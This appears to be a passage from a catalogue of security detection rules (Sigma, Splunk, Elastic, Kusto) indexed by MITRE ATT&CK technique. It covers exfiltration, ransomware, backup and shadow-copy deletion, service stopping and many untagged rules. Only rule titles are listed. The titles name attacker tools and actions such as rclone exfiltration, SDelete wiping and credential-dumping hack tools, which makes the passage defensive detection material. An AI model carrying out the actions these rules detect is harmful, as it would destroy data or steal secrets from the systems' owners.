- Sigma Network Connection Initiated To DevTunnels Domain test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 19 rules
- Elastic Connection to Commonly Abused Web Services production
- Sigma DNS Query for Anonfiles.com Domain - DNS Client test
- Sigma DNS Query for Anonfiles.com Domain - Sysmon test
- Sigma DNS Query To MEGA Hosting Website test
- Sigma DNS Query To MEGA Hosting Website - DNS Client test
- Sigma DNS Query To Ufile.io test
- Sigma DNS Query To Ufile.io - DNS Client test
- Sigma Network Connection Initiated To Mega.nz test
- Elastic Potential Data Exfiltration via Rclone production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - Rclone Execution test
- Sigma PUA - Restic Backup Tool Execution experimental
- Sigma Rclone Config File Creation test
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Dropbox API Usage test
- Splunk Windows Azure Storage Utility Execution Via CLI production
- Splunk Windows OneDrive Share Mounted via Net production
Impact
Data Destruction T1485 28 rules
- Elastic Backup Deletion with Wbadmin production
- Splunk Cipher.exe Execution (Sysmon)
- Splunk Cipher.exe Execution (Windows Event Log)
- Splunk Common Ransomware Extensions production
- Splunk Common Ransomware Notes production
- Sigma Deleted Data Overwritten Via Cipher.EXE test
- Kusto Deletion of data on multiple drives using cipher exe available
- Splunk Detect DNS Query to Decommissioned S3 Bucket experimental
- Splunk Excessive File Deletion In WinDefender Folder production
- Sigma Fsutil Suspicious Invocation stable
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential File Overwrite Via Sysinternals SDelete test
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Kusto Potential re-named sdelete usage available
- Kusto Potential re-named sdelete usage (ASIM Version)
- Sigma Potential Secure Deletion with SDelete test
- Elastic Potential System Tampering via File Modification production
- Sigma Renamed Sysinternals Sdelete Execution test
- Splunk Sdelete Application Execution production
- Kusto Sdelete deployed via GPO and run recursively available
- Kusto Sdelete deployed via GPO and run recursively (ASIM Version)
- Elastic Suspicious File Renamed via SMB production
- Elastic Third-party Backup Files Deleted via Unexpected Process production
- Splunk Windows Data Destruction Recursive Exec Files Deletion production
- Splunk Windows Disable Memory Crash Dump production
- Splunk Windows File Without Extension In Critical Folder production
- Splunk Windows High File Deletion Frequency production
Data Encrypted for Impact T1486 28 rules
- Kusto AV detections related to Europium actors
- Kusto AV detections related to Hive Ransomware
- Kusto AV detections related to Zinc actors available
- Sigma BitLocker feature configuration (Reg via command) experimental
- Sigma BitLocker server feature activation (PowerShell) experimental
- Sigma BlueSky Ransomware Artefacts test
- Kusto Dev-0270 Registry IOC - September 2022 available
- Kusto Dev-0530 File Extension Rename
- Sigma FunkLocker Ransomware File Creation experimental
- Splunk High Process Termination Frequency production
- Sigma Load Of RstrtMgr.DLL By A Suspicious Process test
- Sigma Load Of RstrtMgr.DLL By An Uncommon Process test
- Sigma LockerGoga Ransomware Activity stable
- Sigma Portable Gpg.EXE Execution test
- Sigma Potential Conti Ransomware Activity test
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Splunk Ransomware Notes bulk creation production
- Sigma Renamed Gpg.EXE Execution test
- Splunk Ryuk Test Files Detected production
- Splunk Samsam Test File Write production
- Sigma Suspicious Creation TXT File in User Desktop test
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious Reg Add BitLocker test
- Sigma WannaCry Ransomware Activity test
- Splunk Windows .Key File Creation in Root Directory production
- Splunk Windows BitLocker Suspicious Command Usage production
- Splunk Windows DiskCryptor Usage production
Service Stop T1489 29 rules
- Sigma Application Uninstalled test
- Sigma Delete All Scheduled Tasks test
- Sigma Delete Important Scheduled Task test
- Sigma Disable Important Scheduled Task test
- Splunk Excessive Attempt To Disable Services production
- Sigma Important Scheduled Task Deleted or Disabled test
- Sigma Massive processes termination burst experimental
- Sigma Massive services deletion burst experimental
- Sigma Massive services termination burst experimental
- Sigma Process Terminated Via Taskkill test
- Sigma Service deactivation (command) experimental
- Elastic Service Disabled via Registry Modification production
- Splunk Service Stop Commands (PowerShell)
- Splunk Service Stop Commands (Sysmon)
- Splunk Service Stop Commands (Windows Event Log)
- Sigma Stop Windows Service Via Net.EXE test
- Sigma Stop Windows Service Via PowerShell Stop-Service test
- Sigma Stop Windows Service Via Sc.EXE test
- Sigma Suspicious Windows Service Tampering test
- Splunk Windows - Service Stop (PowerShell)
- Splunk Windows - Service Stop (Windows Event Log)
- Splunk Windows Excessive Service Stop Attempt production
- Splunk Windows Processes Killed By Industroyer2 Malware production
- Splunk Windows Security Account Manager Stopped production
- Splunk Windows Service Deletion In Registry production
- Splunk Windows Service Stop Attempt production
- Splunk Windows Service Stop By Deletion production
- Splunk Windows Service Stop Win Updates production
- Splunk Windows Set Account Password Policy To Unlimited Via Net production
Inhibit System Recovery T1490 56 rules
- Sigma All Backups Deleted Via Wbadmin.EXE test
- Sigma Amsi.DLL Load By Uncommon Process test
- Elastic Backup Deletion with Wbadmin production
- Sigma Backup Files Deleted test
- Splunk Bcdedit Command Back To Normal Mode Boot production
- Splunk BCDEdit Failure Recovery Modification production
- Sigma Boot Configuration Tampering Via Bcdedit.EXE stable
- Splunk Change To Safe Mode With Network Config production
- Sigma Copy From VolumeShadowCopy Via Cmd.EXE test
- Splunk Delete ShadowCopy With PowerShell production
- Sigma Delete Volume Shadow Copies Via WMI With PowerShell stable
- Splunk Deleting Shadow Copies production
- Sigma Deletion of Volume Shadow Copies via WMI with PowerShell test
- Sigma Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script test
- Kusto Detect Malicious Usage of Recovery Tools to Delete Backup Files available
- Kusto Detecting UAC bypass - ChangePK and SLUI registry tampering available
- Kusto Detecting UAC bypass - elevated COM interface available
- Kusto Detecting UAC bypass - modify Windows Store settings available
- Splunk Disabling SystemRestore In Registry production
- Sigma File Recovery From Backup Via Wbadmin.EXE test
- Elastic Modification of Boot Configuration production
- Sigma New Root or CA or AuthRoot Certificate to Store test
- Sigma Potential Dtrack RAT Activity stable
- Sigma Potential Maze Ransomware Activity test
- Elastic Potential Ransomware Note File Dropped via SMB production
- Elastic Potential System Tampering via File Modification production
- Sigma Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load test
- Splunk Prevent Automatic Repair Mode using Bcdedit production
- Sigma Registry Disable System Restore test
- Splunk Resize ShadowStorage volume production
- Sigma Sensitive File Access Via Volume Shadow Copy Backup test
- Sigma Shadow Copies Deletion Using Operating Systems Utilities stable
- Kusto Shadow Copy Deletions available
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious Volume Shadow Copy VSS_PS.dll Load test
- Sigma Suspicious Volume Shadow Copy Vssapi.dll Load test
- Sigma System Restore Registry Modification via CommandLine experimental
- Elastic Third-party Backup Files Deleted via Unexpected Process production
- Elastic Volume Shadow Copy Deleted or Resized via VssAdmin production
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Elastic Volume Shadow Copy Deletion via WMIC production
- Sigma VSS backup deletion (WMI) experimental
- Sigma VSS backup deletion or resize experimental
- Sigma VSS backup deletion via WMI (Powershell) experimental
- Sigma WannaCry Ransomware Activity test
- Splunk WBAdmin Delete System Backups production
- Sigma Windows Backup Deleted Via Wbadmin.EXE test
- Splunk Windows BitLocker Suspicious Command Usage production
- Splunk Windows Cisco Secure Endpoint Related Service Stopped production
- Sigma Windows native backup deletion experimental
- Sigma Windows native backup size re-configuration experimental
- Sigma Windows Recovery Environment Disabled Via Reagentc experimental
- Splunk Windows Security And Backup Services Stop production
- Splunk Windows Suspicious File in EFI Volume production
- Splunk Windows WBAdmin File Recovery From Backup production
- Splunk Windows WMIC Shadowcopy Delete production
Defacement T1491 6 rules
- Splunk Modification Of Wallpaper production
- Sigma Potential Ransomware Activity Using LegalNotice Message test
- Sigma Potentially Suspicious Desktop Background Change Using Reg.EXE test
- Sigma Potentially Suspicious Desktop Background Change Via Registry test
- Sigma Replace Desktop Wallpaper by Powershell test
- Splunk Windows Defacement Modify Transcodedwallpaper File production
Resource Hijacking T1496 7 rules
- Kusto Chia_Crypto_Mining IOC - June 2021 available
- Kusto DNS events related to mining pools (ASIM DNS Schema)
- Sigma Network Communication With Crypto Mining Pool stable
- Sigma Potential Crypto Mining Activity stable
- Splunk Potential Cryptomining Commands (PowerShell)
- Splunk Potential Cryptomining Commands (Sysmon)
- Splunk Potential Cryptomining Commands (Windows Event Log)
Network Denial of Service T1498 1 rule
- Sigma Potential BlackByte Ransomware Activity test
Endpoint Denial of Service T1499 5 rules
- Sigma Audit CVE Event test
- Sigma CVE-2024-49113 Exploitation Attempt - LDAP Nightmare experimental
- Kusto Excessive number of failed connections from a single source (ASIM Network Session schema) available
- Sigma LSASS Crash Via Netlogon Stack Buffer Overflow - CVE-2026-41089 experimental
- Splunk Potential CVE-2024-49113 - LDAPNightmare (Windows Event Log)
Endpoint Denial of Service: Application or System Exploitation T1499.004 1 rule
- Sigma Audit CVE Event test
System Shutdown/Reboot T1529 7 rules
- Sigma Silence.EDA Detection test
- Sigma Suspicious Execution of Shutdown test
- Sigma Suspicious Execution of Shutdown to Log Out test
- Splunk System Shutdown or Reboot (Windows Event Log)
- Splunk Windows System LogOff Commandline production
- Splunk Windows System Reboot CommandLine production
- Splunk Windows System Shutdown CommandLine production
Account Access Removal T1531 10 rules
- Splunk Account Password Changed from Command Line - Windows (PowerShell)
- Splunk Account Password Changed from Command Line - Windows (Windows Event Log)
- Elastic Account Password Reset Remotely production
- Sigma Remove Account From Domain Admin Group test
- Sigma User Logoff Event test
- Splunk Windows Account Access Removal via Logoff Exec production
- Splunk Windows Excessive Usage Of Net App production
- Splunk Windows Powershell Logoff User via Quser production
- Splunk Windows User Deletion Via Net production
- Splunk Windows User Disabled Via Net production
Disk Wipe T1561 2 rules
- Splunk Windows Raw Access To Disk Volume Partition production
- Splunk Windows Raw Access To Master Boot Record Drive production
Disk Wipe: Disk Structure Wipe T1561.002 2 rules
- Splunk Windows Raw Access To Disk Volume Partition production
- Splunk Windows Raw Access To Master Boot Record Drive production
Data Manipulation T1565 3 rules
- Sigma ISATAP Router Address Was Set experimental
- Sigma Powershell Add Name Resolution Policy Table Rule test
- Splunk Windows WBAdmin File Recovery From Backup production
Data Manipulation: Stored Data Manipulation T1565.001 1 rule
- Splunk Windows WBAdmin File Recovery From Backup production
Data Manipulation: Transmitted Data Manipulation T1565.002 1 rule
- Sigma ISATAP Router Address Was Set experimental
Uncategorized
T0136 T0136 2 rules
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma User account creation disguised in a computer account experimental
Untagged
- Sigma .RDP File Created By Uncommon Application test
- Sigma AADInternals PowerShell Cmdlets Execution - ProccessCreation test
- Sigma AADInternals PowerShell Cmdlets Execution - PsScript test
- Sigma Active Directory Structure Export Via Ldifde.EXE test
- Sigma ADCS Certificate Template Configuration Vulnerability test
- Sigma ADCS Certificate Template Configuration Vulnerability with Risky EKU test
- Sigma Add Debugger Entry To AeDebug For Persistence test
- Sigma Add Debugger Entry To Hangs Key For Persistence test
- Sigma Add Windows Capability Via PowerShell Cmdlet test
- Sigma Add Windows Capability Via PowerShell Script test
- YARA-L ADFS DB Suspicious Named Pipe Connection
- Sigma Amsi.DLL Loaded Via LOLBIN Process test
- Sigma Anydesk Remote Access Software Service Installation test
- Sigma AppX Located in Known Staging Directory Added to Deployment Pipeline test
- Sigma AppX Located in Uncommon Directory Added to Deployment Pipeline test
- Sigma AppX Package Deployment Failed Due to Signing Requirements test
- Sigma Arbitrary Binary Execution Using GUP Utility test
- Kusto ASR Rare and Untrusted Executables
- Sigma Assembly DLL Creation Via AspNetCompiler test
- Sigma Base64 MZ Header In CommandLine test
- Sigma Cab File Extraction Via Wusa.EXE test
- Sigma Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths test
- Sigma Chromium Browser Headless Execution To Mockbin Like Site test
- Sigma ClickOnce Deployment Execution - Dfsvc.EXE Child Process test
- Sigma CodeIntegrity - Blocked Image Load With Revoked Certificate test
- Sigma CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked test
- Sigma CodeIntegrity - Revoked Image Loaded test
- Sigma CodeIntegrity - Revoked Kernel Driver Loaded test
- Sigma CodeIntegrity - Unmet Signing Level Requirements By File Under Validation experimental
- Sigma CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module test
- Sigma CodeIntegrity - Unsigned Image Loaded test
- Sigma CodeIntegrity - Unsigned Kernel Module Loaded test
- Sigma COLDSTEEL Persistence Service Creation test
- Sigma COLDSTEEL RAT Anonymous User Process Execution test
- Sigma COLDSTEEL RAT Cleanup Command Execution test
- Sigma COLDSTEEL RAT Service Persistence Execution test
- Sigma Command Executed Via Run Dialog Box - Registry test
- Sigma Computer Password Change Via Ksetup.EXE test
- Sigma Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE test
- Sigma CrackMaxpExec share permission enumeration experimental
- Sigma Creation of a Diagcab test
- Sigma Creation Of a Suspicious ADS File Outside a Browser Download test
- Sigma Cscript/Wscript Potentially Suspicious Child Process test
- Sigma Curl Web Request With Potential Custom User-Agent test
- Sigma CVE-2021-44077 POC Default Dropped File test
- Sigma CVE-2023-23397 Exploitation Attempt test
- Sigma CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File test
- Sigma CVE-2023-40477 Potential Exploitation - .REV File Creation test
- Sigma CVE-2023-40477 Potential Exploitation - WinRAR Application Crash test
- Sigma CVE-2024-1708 - ScreenConnect Path Traversal Exploitation test
- Sigma CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security test
- Sigma Delete Defender Scan ShellEx Context Menu Registry Key experimental
- Sigma Deployment AppX Package Was Blocked By AppLocker test
- Sigma Deployment Of The AppX Package Was Blocked By The Policy test
- Sigma DiagTrackEoP Default Login Username test
- Sigma Diamond Sleet APT DNS Communication Indicators test
- Sigma Diamond Sleet APT File Creation Indicators test
- Sigma Diamond Sleet APT Process Activity Indicators test
- Sigma Disable Macro Runtime Scan Scope test
- Sigma DMP/HDMP File Creation test
- Sigma DNS Query To Put.io - DNS Client test
- Sigma DPRK Threat Actor - C2 Communication DNS Indicators test
- Sigma Driver Added To Disallowed Images In HVCI - Registry test
- Sigma DriverQuery.EXE Execution test
- Sigma Drop Binaries Into Spool Drivers Color Folder test
- Sigma Dump Ntds.dit To Suspicious Location test
- Sigma DumpStack.log Defender Evasion test
- Sigma Email Exifiltration Via Powershell test
- Sigma Enable Local Manifest Installation With Winget test
- Sigma Execution Of Non-Existing File test
- Sigma Execution of Suspicious File Type Extension test
- Sigma File Creation Related To RAT Clients experimental
- Sigma File Decryption Using Gpg4win test
- Sigma File Download From IP URL Via Curl.EXE test
- Sigma File Encryption Using Gpg4win test
- Sigma File Encryption/Decryption Via Gpg4win From Suspicious Locations test
- Splunk File with Samsam Extension production
- Sigma Firewall Rule Update Via Netsh.EXE test
- Sigma Forest Blizzard APT - Process Creation Activity experimental
- Sigma GatherNetworkInfo.VBS Reconnaissance Script Output test
- Sigma Goofy Guineapig Backdoor IOC test
- Sigma Goofy Guineapig Backdoor Service Creation test
- Sigma Griffon Malware Attack Pattern test
- Sigma HackTool - DiagTrackEoP Default Named Pipe test
- Sigma HackTool - Evil-WinRm Execution - PowerShell Module test
- Sigma HackTool - GMER Rootkit Detector and Remover Execution test
- Sigma HackTool - LaZagne Execution experimental
- Sigma HackTool - LocalPotato Execution test
- Sigma HackTool - NPPSpy Hacktool Usage test
- Sigma HackTool - SharpLDAPmonitor Execution test
- Sigma HackTool - Wmiexec Default Powershell Command test
- Sigma IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols test
- Sigma IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI test
- Sigma ImagingDevices Unusual Parent/Child Processes test
- Sigma Import New Module Via PowerShell CommandLine test
- Sigma Important Windows Service Terminated Unexpectedly test
- Sigma Important Windows Service Terminated With Error test
- Sigma Insecure Proxy/DOH Transfer Via Curl.EXE test
- Sigma Insecure Transfer Via Curl.EXE test
- Sigma Internet Explorer DisableFirstRunCustomize Enabled test
- Sigma Kernel Memory Dump Via LiveKD test
- Sigma Lace Tempest Cobalt Strike Download test
- Sigma Lace Tempest File Indicators test
- Sigma Lace Tempest Malware Loader Execution test
- Sigma LiveKD Driver Creation test
- Sigma LiveKD Driver Creation By Uncommon Process test
- Sigma LiveKD Kernel Memory Dump File Created test
- Sigma Loading Diagcab Package From Remote Path test
- Sigma Local File Read Using Curl.EXE test
- Sigma Locked Workstation stable
- Sigma Logged-On User Password Change Via Ksetup.EXE test
- Sigma LOLBIN Execution From Abnormal Drive test
- Splunk MacOS - Re-opened Applications experimental
- Sigma Malicious DLL Load By Compromised 3CXDesktopApp test
- Sigma Microsoft Defender massive host infection experimental
- Sigma Microsoft Defender massive virus outbreach experimental
- Sigma Microsoft Defender signatures not up to date experimental
- Kusto Microsoft Recommended Driver Block List
- Sigma Mint Sandstorm - AsperaFaspex Suspicious Process Execution test
- Sigma Mint Sandstorm - Log4J Wstomcat Process Execution test
- Sigma Mint Sandstorm - ManageEngine Suspicious Process Execution test
- Sigma Mshtml.DLL RunHTMLApplication Suspicious Usage test
- Sigma MSI Installation From Suspicious Locations test
- Sigma Mstsc.EXE Execution From Uncommon Parent test
- Sigma NetSupport Manager Service Install test
- Sigma New File Association Using Exefile test
- Sigma New ODBC Driver Registered test
- Sigma New Virtual Smart Card Created Via TpmVscMgr.EXE test
- Sigma Nslookup PowerShell Download Cradle - ProcessCreation test
- Sigma NtdllPipe Like Activity Execution test
- Sigma Obfuscated IP Download Activity test
- Sigma Obfuscated IP Via CLI test
- Sigma Office Application Initiated Network Connection Over Uncommon Ports test
- Sigma Old TLS1.0/TLS1.1 Protocol Version Enabled test
- Sigma OneNote Attachment File Dropped In Suspicious Location test
- Sigma Onyx Sleet APT File Creation Indicators test
- Sigma PaperCut MF/NG Exploitation Related Indicators test
- Sigma PaperCut MF/NG Potential Exploitation test
- Kusto Password Spray
- Sigma PDF File Created By RegEdit.EXE test
- Sigma Peach Sandstorm APT Process Activity Indicators test
- Sigma Persistence Via Disk Cleanup Handler - Autorun test
- Sigma Persistence Via Hhctrl.ocx test
- Sigma Persistence Via TypedPaths - CommandLine test
- Sigma Pikabot Fake DLL Extension Execution Via Rundll32.EXE test
- Sigma Potential Active Directory Enumeration Using AD Module - ProcCreation test
- Sigma Potential Active Directory Enumeration Using AD Module - PsModule test
- Sigma Potential Active Directory Enumeration Using AD Module - PsScript test
- Sigma Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity test
- Sigma Potential APT FIN7 Related PowerShell Script Created test
- Sigma Potential APT Mustang Panda Activity Against Australian Gov test
- Sigma Potential AS-REP Roasting via Kerberos TGT Requests experimental
- Sigma Potential Attachment Manager Settings Associations Tamper test
- Sigma Potential Attachment Manager Settings Attachments Tamper test
- Sigma Potential Binary Or Script Dropper Via PowerShell test
- Sigma Potential COLDSTEEL Persistence Service DLL Creation test
- Sigma Potential COLDSTEEL Persistence Service DLL Load test
- Sigma Potential COLDSTEEL RAT File Indicators test
- Sigma Potential COLDSTEEL RAT Windows User Creation test
- Sigma Potential Compromised 3CXDesktopApp Beaconing Activity - DNS test
- Sigma Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon test
- Sigma Potential Cookies Session Hijacking test
- Sigma Potential CVE-2022-29072 Exploitation Attempt test
- Sigma Potential CVE-2023-21554 QueueJumper Exploitation test
- Sigma Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution test
- Sigma Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation test
- Sigma Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location test
- Sigma Potential CVE-2023-36884 Exploitation - Share Access test
- Sigma Potential CVE-2023-36884 Exploitation Dropped File test
- Sigma Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation test
- Sigma Potential Data Exfiltration Via Audio File test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 test
- Sigma Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 test
- Sigma Potential Devil Bait Related Indicator test
- Sigma Potential Discovery Activity Via Dnscmd.EXE test
- Sigma Potential DLL Injection Via AccCheckConsole test
- Sigma Potential Encrypted Registry Blob Related To SNAKE Malware test
- Sigma Potential Exploitation Attempt From Office Application test
- Sigma Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process test
- Sigma Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group test
- Sigma Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity test
- Sigma Potential File Override/Append Via SET Command test
- Sigma Potential Goofy Guineapig Backdoor Activity test
- Sigma Potential Goofy Guineapig GoolgeUpdate Process Anomaly test
- Sigma Potential KamiKakaBot Activity - Shutdown Schedule Task Creation test
- Sigma Potential Kapeka Decrypted Backdoor Indicator test
- Kusto Potential Kerberos Relaying Activity - MDE
- Kusto Potential Lateral Movement via MSI ODBC Driver Install over DCOM
- Sigma Potential Malicious AppX Package Installation Attempts test
- Sigma Potential Memory Dumping Activity Via LiveKD test
- Sigma Potential MuddyWater APT Activity test
- Kusto Potential NTLM Relay Attack to Domain Controller
- Sigma Potential Persistence Attempt Via ErrorHandler.Cmd test
- Sigma Potential Persistence Via AutodialDLL test
- Sigma Potential Persistence Via CHM Helper DLL test
- Sigma Potential Persistence Via Disk Cleanup Handler - Registry test
- Sigma Potential Persistence Via DLLPathOverride test
- Sigma Potential Persistence Via LSA Extensions test
- Sigma Potential Persistence Via Mpnotify test
- Sigma Potential Persistence Via MyComputer Registry Keys test
- Sigma Potential Persistence Via New AMSI Providers - Registry test
- Sigma Potential Persistence Via Notepad++ Plugins test
- Sigma Potential Persistence Via Security Descriptors - ScriptBlock test
- Sigma Potential Persistence Via TypedPaths test
- Sigma Potential PowerShell Execution Policy Tampering test
- Sigma Potential PowerShell Execution Policy Tampering - ProcCreation test
- Sigma Potential Privilege Escalation Attempt Via .Exe.Local Technique test
- Sigma Potential Qakbot Rundll32 Execution test
- Sigma Potential Raspberry Robin Dot Ending File test
- Sigma Potential RDP Session Hijacking Activity test
- Sigma Potential Recon Activity Using DriverQuery.EXE test
- Sigma Potential Renamed Rundll32 Execution test
- Sigma Potential SentinelOne Shell Context Menu Scan Command Tampering test
- Sigma Potential ShellDispatch.DLL Functionality Abuse test
- Sigma Potential Signing Bypass Via Windows Developer Features test
- Sigma Potential Signing Bypass Via Windows Developer Features - Registry test
- Sigma Potential SNAKE Malware Installation Binary Indicator test
- Sigma Potential SNAKE Malware Installation CLI Arguments Indicator test
- Sigma Potential SNAKE Malware Persistence Service Execution test
- Sigma Potential Suspicious PowerShell Module File Created test
- Sigma Potential Suspicious Windows Feature Enabled test
- Sigma Potential Suspicious Windows Feature Enabled - ProcCreation test
- Sigma Potential Suspicious Winget Package Installation test
- Kusto Potentially Relayed NTLM Authentication - Microsoft Defender for Endpoint
- Kusto Potentially Relayed NTLM Authentication - Microsoft Sentinel
- Kusto Potentially Relayed NTLM Authentication - Microsoft Sentinel
- Sigma Potentially Suspicious Call To Win32_NTEventlogFile Class test
- Sigma Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript test
- Sigma Potentially Suspicious Child Process Of ClickOnce Application test
- Sigma Potentially Suspicious DMP/HDMP File Creation test
- Sigma Potentially Suspicious Electron Application CommandLine test
- Sigma Potentially Suspicious Execution Of PDQDeployRunner test
- Sigma Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE test
- Sigma Potentially Suspicious File Download From ZIP TLD test
- Sigma Potentially Suspicious GoogleUpdate Child Process test
- Sigma Potentially Suspicious WDAC Policy File Creation experimental
- Sigma Potentially Suspicious Windows App Activity test
- Sigma PowerShell Core DLL Loaded Via Office Application test
- Sigma PowerShell Execution With Potential Decryption Capabilities test
- Sigma PowerShell Hotfix Enumeration test
- Sigma PowerShell Module File Created test
- Sigma PowerShell Module File Created By Non-PowerShell Process test
- Sigma PowerShell Script Change Permission Via Set-Acl test
- Sigma PowerShell Script Dropped Via PowerShell.EXE test
- Sigma PowerShell Script Execution Policy Enabled test
- Sigma PowerShell Set-Acl On Windows Folder test
- Sigma PowerShell Write-EventLog Usage test
- Sigma Process Deletion of Its Own Executable test
- Sigma Process Launched Without Image Name test
- Kusto Process Tree Analysis
- Sigma PsExec Service Child Process Execution as LOCAL SYSTEM test
- Sigma PsExec Service Execution test
- Sigma PSScriptPolicyTest Creation By Uncommon Process test
- Sigma Publisher Attachment File Dropped In Suspicious Location test
- Sigma Qakbot Regsvr32 Calc Pattern test
- Sigma Qakbot Rundll32 Exports Execution test
- Sigma Qakbot Rundll32 Fake DLL Extension Execution test
- Sigma Qakbot Uninstaller Execution test
- Sigma Query Usage To Exfil Data test
- Sigma Rebuild Performance Counter Values Via Lodctr.EXE test
- YARA-L Recon Suspicious Commands CISA Report
- Sigma Register New IFiltre For Persistence test
- Sigma Remote Access Tool - Ammy Admin Agent Execution test
- Sigma Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate test
- Sigma Remote Access Tool - Cmd.EXE Execution via AnyViewer test
- Sigma Remote Access Tool - NetSupport Execution From Unusual Location test
- Sigma Remote Access Tool - RURAT Execution From Unusual Location test
- Sigma Remote Access Tool - ScreenConnect Remote Command Execution - Hunting test
- Sigma Remote AppX Package Downloaded from File Sharing or CDN Domain test
- Sigma Remote Thread Creation In Mstsc.Exe From Suspicious Location test
- Sigma Remote Utilities Host Service Install test
- Sigma Renamed AutoHotkey.EXE Execution test
- Sigma Renamed Microsoft Teams Execution test
- Sigma Renamed NetSupport RAT Execution test
- Sigma Renamed PsExec Service Execution test
- Sigma Renamed Remote Utilities RAT (RURAT) Execution test
- Sigma Renamed VsCode Code Tunnel Execution - File Indicator test
- Kusto RITA Beacon Analyzer for Windows Firewall Events
- Sigma RTCore Suspicious Service Installation test
- Sigma Rundll32 Spawned Via Explorer.EXE test
- Kusto Scheduled Task - Suspicious Network Connection
- Sigma Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor test
- Sigma Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler test
- Sigma ScreenConnect - SlashAndGrab Exploitation Indicators test
- Sigma ScreenConnect User Database Modification test
- Sigma ScreenConnect User Database Modification - Security test
- Kusto Server Network Connection Anomalies
- Sigma Shell Context Menu Command Tampering test
- Sigma Shell Process Spawned by Java.EXE test
- Sigma Small Sieve Malware Registry Persistence test
- Sigma SNAKE Malware Covert Store Registry Key test
- Sigma SNAKE Malware Installer Name Indicators test
- Sigma SNAKE Malware Kernel Driver File Indicator test
- Sigma SNAKE Malware Service Persistence test
- Sigma SNAKE Malware WerFault Persistence File Creation test
- Kusto Spearphishing Attachment: ISO Images (Microsoft Defender for Endpoint)
- Kusto Spearphishing Attachment: ISO Images (Microsoft Sentinel)
- Splunk Spike in File Writes experimental
- Sigma Standard User In High Privileged Group test
- Sigma Start of NT Virtual DOS Machine test
- Kusto SUNBURST suspicious SolarWinds child processes
- Sigma Suspicious Advpack Call Via Rundll32.EXE test
- Sigma Suspicious Application Installed test
- Sigma Suspicious Child Process Of Veeam Dabatase test
- Sigma Suspicious Digital Signature Of AppX Package test
- Kusto Suspicious Driver Load
- Sigma Suspicious Electron Application Child Processes test
- Sigma Suspicious Environment Variable Has Been Registered test
- Sigma Suspicious Execution Location Of Wermgr.EXE test
- Sigma Suspicious Execution of InstallUtil Without Log test
- Sigma Suspicious File Created Via OneNote Application test
- Sigma Suspicious File Creation Activity From Fake Recycle.Bin Folder test
- Sigma Suspicious File Creation In Uncommon AppData Folder test
- Sigma Suspicious File Download From File Sharing Domain Via Curl.EXE test
- Sigma Suspicious File Download From File Sharing Domain Via Wget.EXE test
- Sigma Suspicious File Download From IP Via Curl.EXE test
- Sigma Suspicious File Download From IP Via Wget.EXE test
- Sigma Suspicious File Download From IP Via Wget.EXE - Paths test
- Sigma Suspicious IIS URL GlobalRules Rewrite Via AppCmd test
- Sigma Suspicious Msbuild Execution By Uncommon Parent Process test
- Kusto Suspicious Network Beacons - Microsoft Defender for Endpoint Aggregated Reports
- Kusto Suspicious Network Beacons - Microsoft Defender(MDE/M365D)
- Kusto Suspicious Network Beacons - Sysmon
- Sigma Suspicious Network Connection Binary No CommandLine test
- Kusto Suspicious Network Connections - Supply Chain Attack
- Sigma Suspicious New Instance Of An Office COM Object test
- Sigma Suspicious Obfuscated PowerShell Code test
- Sigma Suspicious Powercfg Execution To Change Lock Screen Timeout test
- Sigma Suspicious PowerShell Invocations - Specific - ProcessCreation test
- Sigma Suspicious PowerShell Mailbox Export to Share test
- Sigma Suspicious PowerShell Mailbox Export to Share - PS test
- Sigma Suspicious Process Execution From Fake Recycle.Bin Folder test
- Sigma Suspicious Processes Spawned by Java.EXE test
- Sigma Suspicious RunAs-Like Flag Combination test
- Sigma Suspicious Shells Spawn by Java Utility Keytool test
- Kusto Suspicious TGT Request with a DC Account
- YARA-L Suspicious Unusual Location LNK File
- Sigma Suspicious Usage Of ShellExec_RunDLL test
- Sigma Suspicious WindowsTerminal Child Processes test
- Sigma Suspicious Wordpad Outbound Connections test
- Sigma Suspicious Workstation Locking via Rundll32 test
- Sigma Sysinternals Tools AppX Versions Execution test
- Sigma Sysmon Blocked Executable test
- Sigma Sysmon Blocked File Shredding test
- Sigma Sysmon Configuration Change test
- Sigma Sysmon File Executable Creation Detected test
